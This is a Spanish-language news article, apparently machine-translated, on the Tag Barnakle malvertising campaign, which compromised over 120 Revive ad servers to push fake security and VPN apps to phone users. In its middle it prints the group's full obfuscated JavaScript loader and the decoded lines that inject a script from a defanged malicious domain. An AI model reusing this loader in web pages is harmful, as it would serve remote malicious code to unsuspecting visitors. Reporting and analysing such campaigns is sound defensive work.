Tecnología

Millones de internautas son atacados por un solo grupo de publicidad maliciosa

Calavera y tibias cruzadas en código binario

Los piratas informáticos comprometieron más de 120 servidores de anuncios en una campaña en curso el año pasado que mostraba anuncios maliciosos en decenas de millones, si no cientos de millones de dispositivos cuando visitaban sitios web que aparentemente son inofensivos.

La publicidad maliciosa es la práctica de mostrar anuncios a las personas que visitan sitios web de confianza. Los anuncios tienen JavaScript incrustado que explota en secreto errores de software o intenta engañar a los visitantes para que instalen una aplicación insegura, paguen tarifas de soporte informático fraudulentas o tomen otras medidas dañinas. Por lo general, detrás de este flagelo de Internet, los estafadores se hacen pasar por compradores y pagan a las redes de distribución de anuncios para mostrar los anuncios maliciosos en sitios web individuales.

Ir a la arteria carótida

Infiltrarse en el ecosistema publicitario como comprador legítimo requiere recursos. Por un lado, los estafadores deben invertir tiempo en aprender cómo funciona el mercado y luego crear una entidad que tenga una reputación confiable. El enfoque también requiere pagar en efectivo para comprar espacio para publicar anuncios maliciosos. Esta no es la técnica de un grupo de publicidad maliciosa al que llama la empresa de seguridad Confiant Tag Barnakle.

«Tag Barnakle, por otro lado, puede sortear este obstáculo inicial por completo yendo directamente a la yugular, un compromiso masivo en la infraestructura de publicación de anuncios», escribió el investigador de confianza Eliya Stein en una publicación de blog publicada el lunes. “Probablemente también tengan un ROI [return on investment] Eso empequeñecería a sus rivales, ya que no tienen que gastar un centavo en campañas publicitarias. «

El año pasado, Tag Barnakle infectó más de 120 servidores con Revive, una aplicación de código abierto para empresas que desean ejecutar su propio servidor de anuncios en lugar de depender de un servicio de terceros. El número 120 es el doble de la cantidad de servidores Revive infectados que Confiant encontró en el último año.

Una vez que un servidor de anuncios se ve comprometido, Tag Barnakle descarga una carga útil maliciosa en él. Para evitar la detección, el grupo utiliza huellas dactilares del lado del cliente para asegurarse de que solo una pequeña cantidad de los objetivos más atractivos reciban los anuncios maliciosos. Los servidores que proporcionan una carga útil secundaria a estos objetivos también utilizan técnicas de encubrimiento para garantizar que también vuelen por debajo del radar.

Aquí hay una descripción general:

Seguro

Cuando Confiant informó sobre Tag Barnakle el año pasado, descubrió que el grupo había infectado alrededor de 60 servidores Revive. La hazaña permitió al grupo distribuir anuncios en más de 360 ​​propiedades web. Los anuncios publicaban actualizaciones falsas de Adobe Flash que, cuando se ejecutaban, instalaban malware en las computadoras de escritorio.

Esta vez, Tag Barnakle está dirigido a usuarios de iPhone y Android. Los sitios web que reciben un anuncio a través de un servidor comprometido entregan un JavaScript muy ofuscado que determina si un visitante está usando un dispositivo iPhone o Android.

https://galikos[.]com/ci.html?mAn8iynQtt=SW50ZWwgSqW5jPngyMEludGVsKFIpIElyaXMoVE0OIFBsdXMgR3J3cGhpY37gNjU1

En el caso de que los visitantes pasen esta y otras pruebas de huellas dactilares, recibirán una carga útil secundaria que se ve así:

var _0x209b=["charCodeAt","fromCharCode","atob","length"];(function(_0x58f22e,_0x209b77){var _0x3a54d6=function(_0x562d16){while(--_0x562d16){_0x58f22e["push"](_0x58f22e["shift"]());}};_0x3a54d6(++_0x209b77);}(_0x209b,0x1d9));var _0x3a54=function(_0x58f22e,_0x209b77){_0x58f22e=_0x58f22e-0x0;var _0x3a54d6=_0x209b[_0x58f22e];return _0x3a54d6;};function pr7IbU3HZp6(_0x2df7f1,_0x4ed28f){var _0x40b1c0=[],_0xfa98e6=0x0,_0x1d2d3f,_0x4daddb="";for(var _0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0x40b1c0[_0xaefdd9]=_0xaefdd9;}for(_0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9]+_0x4ed28f["charCodeAt"](_0xaefdd9%_0x4ed28f[_0x3a54("0x2")]))%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f;}_0xaefdd9=0x0,_0xfa98e6=0x0;for(var _0x2bdf25=0x0;_0x2bdf25<_0x2df7f1[_0x3a54("0x2")];_0x2bdf25++){_0xaefdd9=(_0xaefdd9+0x1)%0x100,_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9])%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f,_0x4daddb+=String[_0x3a54("0x0")](_0x2df7f1[_0x3a54("0x3")](_0x2bdf25)^_0x40b1c0[(_0x40b1c0[_0xaefdd9]+_0x40b1c0[_0xfa98e6])%0x100]);}return _0x4daddb;}function fCp5tRneHK(_0x2deb18){var _0x3d61b2="";try{_0x3d61b2=window[_0x3a54("0x1")](_0x2deb18);}catch(_0x4b0a86){}return _0x3d61b2;};var qIxFjKSY6BVD = ["Bm2CdEOGUagaqnegJWgXyDAnxs1BSQNre5yS6AKl2Hb2j0+gF6iL1n4VxdNf+D0/","DWuTZUTZO+sQsXe8Ng==","j6nfa3m","Y0d83rLB","Y0F69rbB65Ug6d9y","gYTeJruwFuW","n3j6Vw==","n2TyRkwJoyYulkipRrYr","dFCGtizS","yPnc","2vvPcUEpsBZhStE=","gfDZYmHUEBxRWrw4M"];var aBdDGL0KZhomY5Zl = document[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[1]), qIxFjKSY6BVD[2])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[3]), qIxFjKSY6BVD[5]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[6]), qIxFjKSY6BVD[8]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[7]), qIxFjKSY6BVD[8]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[9]), qIxFjKSY6BVD[11]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[0]), qIxFjKSY6BVD[2]));var bundle = document.body||document.documentElement;bundle[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[10]), qIxFjKSY6BVD[11])](aBdDGL0KZhomY5Zl);

Al decodificar, la carga útil es:

var aBdDGL0KZhomY5Zl = document["createElement"]("script");
aBdDGL0KZhomY5Zl["setAtrribute"]("text/javascript");
aBdDGL0KZhomY5Zl["setAtrribute"]("src", "https://overgalladean[.]com/apu.php?zoneid=2721667");

Como muestra el código ofuscado, los anuncios se publican a través de Overgalladean.[.]com, un dominio que, según Confiant, es utilizado por PropellerAds, una red publicitaria que empresas de seguridad como Malwarebytes han documentado durante mucho tiempo como maliciosa.

Cuando los investigadores de Confiant jugaron el rastreador de clics para anuncios de hélice en los tipos de dispositivos a los que se dirigía Tag Barnakle, vieron anuncios como este:

Seguro

Sirvió a decenas de millones

La mayoría de los anuncios atraen a los objetivos a una lista de la App Store en busca de aplicaciones falsas de seguridad o VPN con costos de suscripción ocultos o «tráfico desviado con fines nefastos».

Con los servidores de anuncios, a menudo integrados con múltiples intercambios de anuncios, los anuncios pueden extenderse a cientos, posiblemente miles, de sitios web individuales. Confiant no sabe cuántos usuarios finales están expuestos a la publicidad, pero la compañía cree que el número es alto.

“Cuando consideramos que algunas de estas empresas de medios han hecho esto [Revive] Al integrarse con las principales plataformas de publicidad programática, el alcance de Tag Barnakle se encuentra fácilmente en los diez, si no cientos, de millones de dispositivos ”, escribió Stein. «Esta es una estimación conservadora que tiene en cuenta el hecho de que están colocando cookies en sus víctimas para detectar la carga útil con baja frecuencia, lo que probablemente ralentizará la detección de su presencia».

Más populares

To Top